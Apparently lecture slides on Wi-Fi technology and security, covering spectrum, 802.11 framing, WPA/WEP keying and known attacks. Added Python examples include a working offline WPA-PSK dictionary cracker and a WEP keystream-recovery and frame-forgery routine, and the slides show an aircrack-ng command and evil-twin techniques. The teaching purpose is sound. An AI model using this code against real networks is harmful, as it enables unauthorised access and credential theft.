
The Radio Spectrum in the US

1
Source US Department of Commerce http://www.ntia.doc.gov/osmhome/allochrt.PDF
Wi-Fi Radio Spectrum
2
Wi-Fi is an unlicensed
service

It has its beginnings in the ISM
(Industrial, Scientific, Medical)
band, where it was not
desirable or profitable to
license such short-range
devices.
2.4 GHz 5 GHz
The first frequencies available for
Wi-Fi use were in the 2.4 GHz
range

As Wi-Fi popularity and usage
increased, the regulatory bodies
allocated additional spectrum in
the
5 GHz band.

The spectrum we use today is also
used by Amateur (Ham Radio) and
other services such as radio
location (radar).

There is more bandwidth in 5 GHz,
with mechanisms in place to coexist
with licensed services such
as radar, using Dynamic Frequency
Selection (DFS)
Wi-Fi Radio Spectrum 2.4 GHz
3
Even today, many portable devices in use are limited
to 2.4 GHz only, including newer devices, but this is
changing.

802.11b/g is 2.4 GHz
802.11a is 5 GHz
802.11n (can be either band) 2.4 or 5 GHz
The 2.4 GHz spectrum in the US
has 3 non-overlapping channels
1, 6 and 11.

There are plenty of channels in
the 5 GHz spectrum and (at 20 MHz
width) they do not overlap

2.4 GHz and 5 GHz are different
portions of the radio band and
usually require separate
antennas

Most, if not all, 5 GHz devices
also have support for 2.4 GHz -
however there are still many 2.4
GHz only devices.
Wi-Fi Radio Spectrum 2.4 GHz
4
Wi-Fi Radio Spectrum 5 GHz Channels
5
Note: 5 GHz channels do
not have the severe
overlap that 2.4 GHz
channels have but they
use DFS to enable
sharing of the band
Wi-Fi Based on a Series of 802.11 PHY
Standards
7
[figure: timeline from The Past to The Future: 802.11b, 802.11a, 802.11g, 802.11n, 802.11ac, then 802.11ad, 802.11af, 802.11ah]
Wi-Fi connectivity today is based on the
802.11a/b/g/n PHY standards ...
8
Band        Technology    Standard (year)                   PHY rate
2.4 GHz     DSSS          802.11b-1999                      < 11 Mb/s
2.4 GHz     OFDM          802.11g-2003                      < 54 Mb/s
5 GHz       OFDM          802.11a-1999                      < 54 Mb/s
2.4/5 GHz   OFDM (MIMO)   802.11n-2009 (Draft 2.0, 2006)    < 600 Mb/s
802.11ac, the next generation Wi-Fi, is just
around the corner

9
IEEE 802.11ac
Use cases: similar to 802.11n; voice/video/data for consumer/enterprise
Technology: extension of 802.11n, in 5 GHz only
Functionality: similar range to 802.11n; faster than 802.11n, up to ~2.5 Gb/s
Availability: first usable draft standard in early 2012; first wave of certification in early 2013

802.11ac uses MU-MIMO to provide switch
rather than hub technology
10
Single User MIMO in 802.11n
sends one frame to one receiver
Multi-user MIMO in 802.11ac
sends multiple frames to multiple
receivers
AP with 4 antennas can send 1 stream
each to 3 smartphones, all at the same
time
AP must beamform 1 space-time stream
to each receiver and simultaneously
null-steer that space-time stream toward the
two other receivers
Basic Terminology
Stations
Clients (mobile devices, laptops, printers, etc)
Access Points
802.11 frames must be converted in order to
communicate with the wired network
This bridging function is the most important
part of an access point
11
Basic Terminology
Basic Service Set (BSS)
Basic building block of all wireless networks: essentially one or
more stations that communicate with each other

Independent BSS (IBSS)
Also known as an Ad-Hoc network. A network comprised of one
or more stations without the use of an access point

Infrastructure BSS
Most common type of deployment; these networks consist of at
least one station and one access point
Station to station communication is relayed by the access point.

12
Basic Terminology
Extended Service Set (ESS)
Formed by linking BSSs together
Usually created to extend the range of a single BSS to facilitate
a greater coverage area
Stations in an ESS may communicate with each other even if
they are in different BSSs

Multi-BSS
Due to the popularity of wireless networks, radio chipset
manufacturers created the ability to have multiple BSS using the
same hardware
This greatly expands functionality by allowing BSSs to be
associated with specific VLANs

13
802.11 LAN architecture
14
Identifiers
BSS Identifier (BSSID):
usually the MAC address
of the access point radio
serving the BSS

Service Set Identifier
(SSID/ESSID): a
friendly name given to
the network; every AP in one ESS
advertises the same SSID but has its own BSSID

[figure: Internet - ethernet switch - two APs, both SSID: Poly,
 with BSSID: 00:12:31:00:11:00 and BSSID: 00:12:34:23:22:33]
Framing
Generic 802.11 Frame

Data and Management Frames

802.11 Session States




15
Generic 802.11 Frame
16
MAC header and body (field sizes in bytes):

  frame control (2) | duration (2) | address 1 (6) | address 2 (6) | address 3 (6) | seq control (2) | address 4 (6) | payload (0 - 2312) | CRC (4)

Frame control field expanded (field sizes in bits):

  protocol version (2) | type (2) | subtype (4) | To AP (1) | From AP (1) | more frag (1) | retry (1) | power mgt (1) | more data (1) | WEP (1) | rsvd (1)
frame control field expanded:
Type/subtype distinguishes
beacon, association, ACK, RTS,
CTS, etc. frames.
To/From AP (To DS/From DS in the standard) defines the meaning of the
address fields
802.11 allows for fragmentation at
the link layer (more frag bit)
802.11 allows stations to enter
sleep mode (power mgt bit)
Seq number identifies
retransmitted frames (eg, when an
ACK is lost); the retry bit marks the retransmission
WEP (now called the Protected Frame bit) = 1 if the payload is encrypted,
whether with WEP, TKIP or CCMP
802.11 Frame: Addressing
17
  frame control (2) | duration (2) | address 1 (6) | address 2 (6) | address 3 (6) | seq control (2) | address 4 (6) | payload (0 - 2312) | CRC (4)

Address 1: MAC address of the wireless host or AP that is to receive this frame
Address 2: MAC address of the wireless host or AP transmitting this frame
Address 3: in infrastructure mode, the MAC address on the wired side (here the
router interface to which the AP is attached); which of the three fields carries
source, destination and BSSID depends on the To/From AP bits
Address 4: present only when both To AP and From AP are set, i.e. frames
bridged between APs over a wireless distribution system (WDS); it is not
used in ad hoc mode
18
Frame from router R1 to host H1 via the AP (Internet - router R1 - AP - H1):
  802.11 frame: address 1 = H1 MAC addr, address 2 = AP MAC addr, address 3 = R1 MAC addr
  802.3 frame (R1 to AP): dest. address = H1 MAC addr, source address = R1 MAC addr
802.11 Frame: Addressing
19
Frame from host H1 to router R1 via the AP:
  802.11 frame: address 1 = AP MAC addr, address 2 = H1 MAC addr, address 3 = R1 MAC addr
  802.3 frame (AP to R1): dest. address = R1 MAC addr, source address = H1 MAC addr
Types of Frames
20
The type and subtype bits in the frame control field (see the generic
frame above) classify every frame:

Data Frames:
Frame Control Type: 10, subtype commonly 0000 (Data); QoS Data uses subtype 1000
Data frames are encrypted when the protected (WEP) flag is set

Management Frames:
Frame Control Type: 00
Address fields are fixed values (address 1 = DA, address 2 = SA, address 3 = BSSID)
Frame payload contains management info (fixed fields and information elements)
Sent unprotected unless 802.11w management frame protection is in use

Control Frames:
Frame Control Type: 01 (ACK, RTS, CTS, ...); short headers with no payload

Management Frames
Association Request subtype 0000
Association Response subtype 0001
Re-Assoc Request subtype 0010
Re-Assoc Response subtype 0011
Probe Request 0100
Probe Response 0101
Beacon 1000
Disassociation 1010
Authentication 1011
Deauthentication 1100

21
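An added worked example (not from these slides) that decodes the frame control field and the address fields described above and uses them for two checks a practitioner wants: reading the SSID element out of a beacon (None for a hidden network) and counting deauthentication frames per BSSID, the signature of the de-authentication attack. The sample frames are constructed inline using the figure's BSSID 00:12:31:00:11:00 and an assumed client MAC; nothing here is captured from a real network.

```python
import struct
from collections import Counter

# Type/subtype names as laid out in the frame control field above
TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0: "association request", 1: "association response",
                 2: "reassociation request", 3: "reassociation response",
                 4: "probe request", 5: "probe response", 8: "beacon",
                 10: "disassociation", 11: "authentication",
                 12: "deauthentication"}


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(frame: bytes) -> dict:
    """Decode the 802.11 MAC header; fields are little-endian as in the standard."""
    fc, duration = struct.unpack_from("<HH", frame, 0)
    ftype, subtype, flags = (fc >> 2) & 3, (fc >> 4) & 0xF, fc >> 8
    info = {"type": TYPE_NAMES.get(ftype, "reserved"), "subtype": subtype,
            "duration": duration,
            "to_ds": bool(flags & 0x01), "from_ds": bool(flags & 0x02),
            "more_frag": bool(flags & 0x04), "retry": bool(flags & 0x08),
            "power_mgt": bool(flags & 0x10), "more_data": bool(flags & 0x20),
            "protected": bool(flags & 0x40)}   # the "WEP" bit in the diagram
    if ftype == 1:                     # ACK/RTS/CTS: short header, RA only
        info["RA"] = fmt_mac(frame[4:10])
        return info
    a1, a2, a3 = (fmt_mac(frame[i:i + 6]) for i in (4, 10, 16))
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]
    info["fragment"], info["sequence"] = seq_ctrl & 0xF, seq_ctrl >> 4
    body = 24
    if ftype == 0:                     # management: address roles are fixed
        info["name"] = MGMT_SUBTYPES.get(subtype, f"mgmt subtype {subtype}")
        info.update(DA=a1, SA=a2, BSSID=a3)
    else:                              # data: To/From DS bits give the meaning
        info["name"] = "data"
        ds = (info["to_ds"], info["from_ds"])
        if ds == (False, False):       # ad hoc / IBSS
            info.update(DA=a1, SA=a2, BSSID=a3)
        elif ds == (True, False):      # station -> AP
            info.update(BSSID=a1, SA=a2, DA=a3)
        elif ds == (False, True):      # AP -> station
            info.update(DA=a1, BSSID=a2, SA=a3)
        else:                          # AP -> AP bridging: 4th address follows seq ctrl
            info.update(RA=a1, TA=a2, DA=a3, SA=fmt_mac(frame[24:30]))
            body = 30
    info["body"] = frame[body:]
    return info


def beacon_ssid(info: dict):
    """SSID element of a beacon body, or None when the AP omits it ("hidden")."""
    ies = info["body"][12:]            # skip timestamp(8), interval(2), capability(2)
    while len(ies) >= 2:
        tag, length = ies[0], ies[1]
        if tag == 0:
            return ies[2:2 + length].decode(errors="replace") or None
        ies = ies[2 + length:]
    return None


def deauth_flood(frames, threshold=5) -> dict:
    """Count deauthentication frames per (sender, BSSID); a burst from one
    BSSID is the signature of the de-authentication attack used to force a
    client to reconnect (these frames are spoofable without 802.11w)."""
    counts = Counter()
    for f in frames:
        p = parse_frame(f)
        if p["type"] == "management" and p["subtype"] == 12:
            counts[(p["SA"], p["BSSID"])] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


# --- constructed sample frames (not captured traffic) -----------------------
AP = bytes.fromhex("001231001100")      # BSSID from the slide's figure
CLIENT = bytes.fromhex("0016cbaabbcc")  # assumed client MAC


def _mgmt_header(subtype, da, sa, bssid, seq):
    fc = subtype << 4                    # type bits 00 = management
    return struct.pack("<HH", fc, 0) + da + sa + bssid + struct.pack("<H", seq << 4)


def build_beacon(bssid, ssid, seq=0):
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, interval, capabilities
    body += bytes([0, len(ssid)]) + ssid.encode()           # SSID element; empty = hidden
    return _mgmt_header(8, b"\xff" * 6, bssid, bssid, seq) + body


def build_deauth(bssid, client, seq=0, reason=7):
    return _mgmt_header(12, client, bssid, bssid, seq) + struct.pack("<H", reason)


def build_data(a1, a2, a3, to_ds=False, from_ds=False, protected=False, seq=0, payload=b""):
    fc = 2 << 2 | (to_ds << 8) | (from_ds << 9) | (protected << 14)  # type bits 10 = data
    return struct.pack("<HH", fc, 0) + a1 + a2 + a3 + struct.pack("<H", seq << 4) + payload


if __name__ == "__main__":
    print(parse_frame(build_beacon(AP, "Poly"))["name"], beacon_ssid(parse_frame(build_beacon(AP, ""))))
    print(deauth_flood([build_deauth(AP, CLIENT, i) for i in range(10)]))
```

The threshold in deauth_flood is a starting point: a handful of deauthentications per BSSID per minute is normal churn, tens per second from one BSSID is an attack (or a misbehaving AP).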
Management Frames - Beacons
Beacons are sent at recurring intervals by
the AP to announce the existence of a
network
Normally contain information such as the
SSID, supported rates, channel and security capabilities
Wireless networks are considered hidden
when the SSID is omitted from the
beacons; the SSID is still sent in the clear in probe requests/responses and
association requests, so hiding it is not a security control
22
Management Frames - Probe Requests and
Responses
Probe Requests
Probe requests are sent by stations to scan for in-range networks
The station will channel hop through all available channels when searching for its networks
during this process
Stations can also send broadcast probe requests (empty SSID) to solicit a response from any AP in their vicinity

Probe Responses
Access points acknowledge a probe request with a probe response to indicate to the client
that a compatible network exists
APs that don't respond to broadcast probe requests are considered closed (hidden)
23
802.11 Session States
Authentication
Establishes the wireless station's identity to the access
point
Open Authentication
Access Point permits any station (with WPA/WPA2 the real
authentication happens afterwards, in the 802.1X/4-way handshake)
Shared Key Authentication
A shared WEP key must be present (WEP only)
AP sends a challenge, client encrypts the challenge with the
key and sends the response to the AP; the exchange exposes a
plaintext/ciphertext pair, i.e. RC4 keystream, to anyone listening
Deauthentication
Terminates a previously established session; unprotected (spoofable)
unless 802.11w is in use
24
802.11 Session States
Association
Record keeping process where the AP identifies itself
as the gateway for a particular wireless station
Disassociation
The process of removing the wireless station from the
network
Roaming/Reassociation
Since clients are not tethered by cable, clients can
move freely around their physical location
In a large ESS, another AP may provide a better signal
strength as the client moves around, and the client reassociates to it
25
Session Establishment
Putting it all together
26
WiFi Security
27
Wi-Fi Security State
28
WEP
Broken many years ago
Replaced by WPA & then WPA2
Do not use!!!!
WPA
Based on TKIP & 802.1X
Breaking
Transitional mechanism
Avoid use!
WPA2
Based on AES & 802.1X
Enterprise class, particularly when used with appropriate EAP methods
Wi-Fi Protected Setup
Designed to encourage consumers to actually use security
Based on WPA2 but not enterprise class
(the external-registrar PIN method is brute-forceable because the 8-digit PIN
is verified in two halves, so disable WPS where it is not needed)
Wi-Fi Alliance is strongly encouraging use of
WPA2 (for enterprise & consumer), and Wi-Fi
Protected Setup (for consumer)
802.11w defines security for management frames
and was certified in early 2012 by the Wi-Fi
Alliance
There are ongoing efforts in 802.11ai to optimise
the process of setting up WPA2 security
WPA
29
About WPA
IEEE 802.11i
History
Draft in 2003, ratified in 2004
Latest is 802.11-2007
Encryption
Needed to address the issues in WEP
Introduced TKIP and AES-CCMP
RC4 - TKIP (Temporal Key Integrity Protocol)
Major improvement over WEP but still based on RC4
Developed so that WEP hardware could be upgraded with a firmware change
AES - CCMP (Advanced Encryption Standard in Counter Mode with Cipher Block
Chaining Message Authentication Code Protocol)
Complete redesign of the encryption mechanisms
Developed to completely replace WEP and TKIP
30
About WPA
IEEE 802.11i
WPA
Certification by the Wi-Fi Alliance
Hastily released in 2003 to certify devices against the 802.11i draft
current at the time
Implies at least TKIP support
WPA2
Certification by the Wi-Fi Alliance
Released in 2004 once 802.11i was ratified
Full compliance with the standard: support for AES-CCMP (mandatory) and TKIP
31
About WPA
TKIP and AES Security Improvements
RC4 - TKIP
Increases the size of the Initialization Vector to 48-bits and the key size
to 128 bits
Message Integrity Check (MIC) within the frame
Dynamic Key Rotation
AES - CCMP
Complete redesign, no longer uses RC4
Re-keys automatically to derive new sets of temporal keys
Uses Packet Number field as a counter to provide replay protection
32
About WPA
Authentication
WPA Personal (WPA-PSK)
A single pre-shared key is distributed to users
If you have the key, you can connect to the network
Most suited for home use.
WPA Enterprise
Flexible Authentication
Can be user based, computer based, etc
Permits centralized user management
Per user Authentication, Authorization and Accounting (AAA)
Most suited for corporations, small businesses.

33
About WPA
Joining the Network with WPA
Step 1: 802.11 Session Establishment
Standard Probe/Authentication/Association Requests and Responses
Step 2: EAP Handshake
Only in WPA Enterprise to generate PMK, more on this later
Step 3: 4 way handshake.
Use PMK to generate/establish encryption keys
Step 4: Data Communication
Successful authentication, now a connected party

34
WPA Enterprise Authentication
IEEE 802.1X
Standard for port-based network access control
Commonly used on wired switches
Introduces three new terms
Supplicant: client attempting to connect to the network
Authenticator: controls access to the network; usually the AP
Authentication Server: authorizes the user to connect (RADIUS server)
Uses EAP for messaging (EAP over LAN, EAPOL, between supplicant and
authenticator; EAP inside RADIUS between authenticator and server)

36
WPA Enterprise Authentication
Extensible Authentication Protocol (EAP)
Originally designed and used for dial-up networking (PPP)
Officially, EAP only has 4 general message types (codes):
EAP-Request
EAP-Response
EAP-Success
EAP-Failure
Supports a variety of authentication methods
Defined by the type field of EAP-Request/Response frames
EAP-TLS: certificate based (mutual) authentication
LEAP: username/password authentication
PEAP/EAP-TTLS: server certificate + username/password inside a TLS tunnel
EAP-FAST: username/password inside a tunnel keyed by a Protected Access
Credential (PAC); a server certificate is optional



37
WPA Enterprise Authentication
EAP Handshake



38
WPA Encryption
Keying
Pairwise Master Key (PMK): used to derive all other keys
WPA-Pre-Shared Key: the PMK is the PSK, derived from the passphrase and
SSID (PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits)
WPA-Enterprise: created during the EAP exchange at the RADIUS server and
distributed to the AP
The four way handshake
Establishes encryption between the AP and the client: exchanges nonces
(ANonce, SNonce) and proves possession of the PMK via MICs
Pairwise Transient Key (PTK)
The key used to encrypt unicast 802.11 traffic (also contains the KCK and
KEK that MIC and wrap the handshake messages themselves)
Group Temporal Key (GTK)
The key used to encrypt broadcast and multicast 802.11 traffic; delivered
encrypted under the KEK in message 3 of the handshake




39
Attacking WPA
Authentication
Most common attacks
Only a limited number exist
Requires at least 1 connected client
Yields username and password
Almost always requires offline brute forcing
Using a complex password thwarts the attack
Encryption
Emerging attacks
Results in the ability to encrypt/decrypt limited traffic
Can inject a small number of packets
Not very stealthy




40
Attacking Authentication: WPA-PSK
Theory
Capture 4-way Handshake
It's possible to test candidate PSKs using the data in the handshake
(MAC addresses, nonces and the MIC of message 2)
Passively: sniff a new client's connection
Actively: DoS (de-authentication attack) the client and watch it reconnect
Brute Force
With the handshake we can launch an offline brute force / dictionary attack
(each guess costs a 4096-iteration PBKDF2, so a long random passphrase stays out of reach)




41
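An added example, not part of the slides, carrying the WPA-PSK keying from the keying slide above and this attack slide through in code: PMK from passphrase and SSID (PBKDF2), PTK from the PMK plus both MAC addresses and both nonces (the 802.11i PRF-512), and the EAPOL-Key MIC that lets an attacker test each candidate passphrase against a captured message 2. The handshake is constructed inline from fixed nonces, the figure's AP MAC and an assumed client MAC; it is not a capture. The first test vector (passphrase "password", SSID "IEEE") is the one published in the 802.11i annex.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk, aa, spa, anonce, snonce) -> bytes:
    """PTK from the PMK plus the MACs and nonces exchanged in messages 1 and 2.
    Byte layout: KCK (16) | KEK (16) | TK (16) | TKIP MIC keys (unused for CCMP)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


# Offsets inside an EAPOL-Key frame: 802.1X header (4) + descriptor type (1)
# + key info (2) + key length (2) + replay counter (8) + nonce (32) + IV (16)
# + RSC (8) + reserved (8) puts the 16-byte Key MIC at byte 81.
MIC_OFFSET = 81


def build_eapol_key(key_info: int, replay_counter: int, nonce: bytes,
                    mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay_counter.to_bytes(8, "big") + nonce + b"\x00" * 16
            + b"\x00" * 8 + b"\x00" * 8 + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (AES-CCMP): HMAC-SHA1 over the frame
    with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline attack: everything except the passphrase is in the capture, so
    re-derive PMK -> PTK -> KCK per candidate and compare the MIC of message 2."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), captured_mic):
            return candidate
    return None


# --- constructed handshake (not a real capture) ----------------------------
SSID = "Poly"                               # SSID from the slide's figure
AA = bytes.fromhex("001231001100")          # authenticator (AP) MAC from the figure
SPA = bytes.fromhex("0016cbaabbcc")         # supplicant MAC, assumed
ANONCE = bytes(range(32))                   # fixed nonces so the demo is reproducible
SNONCE = bytes(range(32, 64))
KEY_INFO_MSG2 = 0x010a                      # descriptor version 2, pairwise, MIC bit set


def make_handshake_msg2(passphrase: str) -> bytes:
    """What the client sends in message 2: its SNonce plus a MIC under the KCK."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    unsigned = build_eapol_key(KEY_INFO_MSG2, 1, SNONCE)
    return build_eapol_key(KEY_INFO_MSG2, 1, SNONCE, mic=eapol_mic(ptk[:16], unsigned))


if __name__ == "__main__":
    msg2 = make_handshake_msg2("correct horse")
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, msg2, ["123456", "password", "correct horse"]))
```

Note that the SSID is the PBKDF2 salt: the PMK computation can be precomputed per SSID (rainbow tables for common SSIDs), which is one more reason not to run a default SSID.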
Attacking Authentication WPA Enterprise
Used in most corporations
Attacks are categorized by EAP Type
A good deployment is hard to break into
Most attacks require brute force
Successful attack results in credentials to access the
network as a regular user




42
Attacking Authentication WPA Enterprise
Authentication Methods - LEAP
About
Stands for Lightweight EAP
Proprietary EAP type developed by Cisco
Operation
Uses the MS-CHAP challenge/response mechanism for authentication
This handshake is transmitted in clear text between the client and the
authentication server, so a sniffer can run an offline dictionary attack on the
captured challenge/response




43
Attacking Authentication WPA Enterprise
Authentication Methods EAP-TTLS and PEAP
About
Both establish a TLS tunnel between the client and authentication server
Tunnel is used to transmit less secure inner authentication credentials (i.e.
PAP/CHAP/MS-CHAP)
EAP-TTLS (Tunneled TLS)
Developed by Funk Software (now Juniper) and Certicom
Supports any inner authentication protocol
PEAP (Protected EAP)
Replacement for LEAP. Developed by RSA, Microsoft and Cisco
Only supports a limited number of inner authentication protocols (inner EAP
methods, typically EAP-MSCHAPv2)



44
Attacking Authentication WPA Enterprise
Authentication Methods EAP/TTLS and PEAP
How it works



45
Attacking Authentication WPA Enterprise
Authentication Methods EAP/TTLS and PEAP
Attack Vectors
Improper certificate validation
Certificates allow the client to verify the identity of the authentication server
Clients are commonly configured to ignore this certificate (or to trust any CA)
This allows an attacker to impersonate the AP and RADIUS server and capture the inner
authentication credentials (cleartext for PAP, an MS-CHAPv2 challenge/response otherwise)
Mitigation: configure supplicants to validate the server certificate against a
specific CA and expected server name


46
WEP
47
Understanding WEP Encryption
History of WEP
1997: WEP introduced

2001: WEP found to be flawed (Fluhrer, Mantin and Shamir)

2002: 104 bit WEP still considered secure

2004: KoreK details advanced attacks and aircrack released

2007: PTW attack released; WEP DEAD, DO NOT USE

Present: people and organizations still using WEP


48
Understanding WEP Encryption
WEP
No longer considered a viable method of securing 802.11 frames

Protects information transmitted via the wireless network by encrypting the data
within the 802.11 frame

The receiver uses the initialization vector (IV) carried in clear in the frame header and the
WEP key to decrypt the data


49
WEP Encryption Process
The CRC-32 ICV
A 4 byte CRC-32 Integrity Check Value (ICV) is computed for the data payload of
the packet and appended to it (CRC-32 is linear, not a keyed MAC, so it does
not stop controlled modification)





The "UNIQUE" Seed

The shared secret key K is static
A 24 bit Initialization Vector (IV) is concatenated with the key (k) to form a
per-packet seed; with only 2^24 IVs a busy network repeats seeds within hours


50
[figure: Plaintext Message (M) || ICV; seed = IV || Shared Key (k)]
WEP Encryption Process
The Keystream
This seed is input into the RC4 stream cipher which outputs a keystream of
arbitrary length
[figure: Shared Key (k), IV -> RC4 -> Keystream 100101001000100000111110101001101101001]
51
WEP Encryption Process
Ciphertext
The plaintext data and the appended CRC-32 value are XORed against an equal
number of bits from the keystream to create the ciphertext
[figure: (Plaintext Message (M) || ICV) XOR Keystream = CipherText (C)]
52
WEP Decryption Process
Decryption: the IV is put into the WEP header in plaintext and the
encrypted packet is sent to the receiver
The receiver uses the IV in the header along with the shared key, k,
to reproduce the RC4 keystream
[figure: 802.11 Hdr | IV | Ciphertext (C); (IV, Shared Key (k)) -> RC4 -> RC4 Keystream]
53
WEP Decryption Process
Decryption
The ciphertext is XORed against the RC4 keystream and the plaintext is
recovered
[figure: Ciphertext (C) XOR Keystream = Plaintext Message (M) || ICV]
54
WEP Decryption Process
Decryption: the CRC-32 Integrity Check Value (ICV) is recomputed to
verify the integrity of the data
[figure: Plaintext Message (M) -> CRC-32 -> ICV; Match?]
55
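An added example, not from the slides, implementing the encryption and decryption process just described (RC4 over IV || K, CRC-32 ICV, XOR) together with the keystream-reuse primitive that the active, fake-authentication and Caffe Latte attacks described later build on: one known plaintext for an IV yields that IV's keystream, and that keystream forges a frame the AP accepts without any knowledge of K. Key, IV and payloads are constructed demo values.

```python
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream: key-scheduling (KSA) then `length` bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """4-byte CRC-32 Integrity Check Value, little-endian as carried in WEP."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, message: bytes) -> bytes:
    """Seed = IV || K; ciphertext = (M || ICV) XOR RC4(seed); IV sent in clear."""
    assert len(iv) == 3 and len(key) in (5, 13)          # WEP-40 or WEP-104
    keystream = rc4(iv + key, len(message) + 4)
    return iv + xor(message + icv(message), keystream)


def wep_decrypt(key: bytes, packet: bytes) -> bytes:
    """Rebuild the keystream from the cleartext IV and K, XOR, then check the ICV."""
    iv, ciphertext = packet[:3], packet[3:]
    plain = xor(ciphertext, rc4(iv + key, len(ciphertext)))
    message, received_icv = plain[:-4], plain[-4:]
    if icv(message) != received_icv:
        raise ValueError("ICV mismatch")
    return message


def recover_keystream(packet: bytes, known_message: bytes) -> bytes:
    """Known plaintext for one packet (a shared-key auth challenge, a predictable
    ARP or DHCP frame) gives the keystream for that IV without knowing K."""
    return xor(packet[3:], known_message + icv(known_message))


def forge_packet(iv: bytes, keystream: bytes, message: bytes) -> bytes:
    """Reuse a recovered keystream under the same IV to build a frame the AP
    will accept as valid, as long as M || ICV fits in the recovered keystream."""
    body = message + icv(message)
    assert len(body) <= len(keystream)
    return iv + xor(body, keystream)


# --- constructed demo values (not a real capture) ---------------------------
KEY = bytes.fromhex("0102030405")        # a 40-bit WEP key, assumed
IV = bytes.fromhex("a1b2c3")


if __name__ == "__main__":
    known = b"ARP who-has 10.0.0.1? tell 10.0.0.7"
    packet = wep_encrypt(KEY, IV, known)
    print(wep_decrypt(KEY, packet))
    ks = recover_keystream(packet, known)             # attacker: no KEY needed
    forged = forge_packet(IV, ks, b"ARP who-has 10.0.0.9? tell 10.0.0.7")
    print(wep_decrypt(KEY, forged))                   # the AP decrypts it cleanly
```

Nothing in the receiver detects the forgery: WEP has no replay counter and the ICV is unkeyed, which is why replaying and forging frames (the active attacks that follow) work at all.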
Attacking WEP
Misc Attacks
Verizon FiOS Actiontec MI424WR
Router ships with WEP enabled by default
WEP key is a function of the SSID
SSID is 5 upper case alphanumeric characters
If you know the SSID you know the default key!
Java/Bash generator exists at:
http://xkyle.com/2009/03/03/verizon-fios-wireless-key-calculator
56
Attacking WEP
The Passive Attack
This was the original attack against WEP
Offline attack once enough IVs are obtained
Relies on passively sniffing WLAN traffic
Stealthy (nothing is transmitted)
57
Attacking WEP
The Passive Attack using aircrack-ng
This is dependent on a .cap file that contains
enough frames to actually crack WEP.
Frames can be generated quickly using active
attack techniques discussed later
Command:
aircrack-ng <filename>
58
Attacking WEP
Active Attack Theory
Goal: generate traffic to get unique IVs
Step 1: Client sends legitimate encrypted data (thus a new/valid IV)
Step 2: Attacker observes the traffic and replays it many times
Step 3: AP accepts ALL the replayed data (WEP has no replay protection), decrypts it and processes it
Step 4: Traffic the AP sends back onto the wireless network in response is encrypted with a
new IV each time
59
Attacking WEP
Fake Authentication - Theory
What if there are currently no connected
clients?
It may be possible to launch the Fake
Authentication attack so the AP thinks we are an
authorized client
Once we create a false association, we can
forward frames through the AP after we
figure out how to craft valid ones
60
Attacking WEP
AP-Less Attacks
Caffe Latte Attack
Targets individual clients who are not in the vicinity
of the wireless network
We can respond to the client's probe requests and
ultimately gain enough packets during the shared
key authentication, initial DHCP and initial ARP
requests made by the client to forge our own ARP
requests
We bombard the client with ARP requests and
use its responses to crack the WEP key
Currently implemented in airbase-ng
61
Generalized Wireless Attack
Evil Twin
Rogue WiFi access point that appears to be a
legitimate one offered on premises
Attacker fools the wireless device into connecting to
the attacker's hotspot instead of the real one
Used to steal passwords and redirect to fraudulent
web sites.
Karmetasploit acts as a wireless AP and answers all probe
requests from wireless clients. Once associated, every service
the client tries to access leads to a malicious application
http://dev.metasploit.com/redmine/projects/framework/wiki/Karmetasploit
62
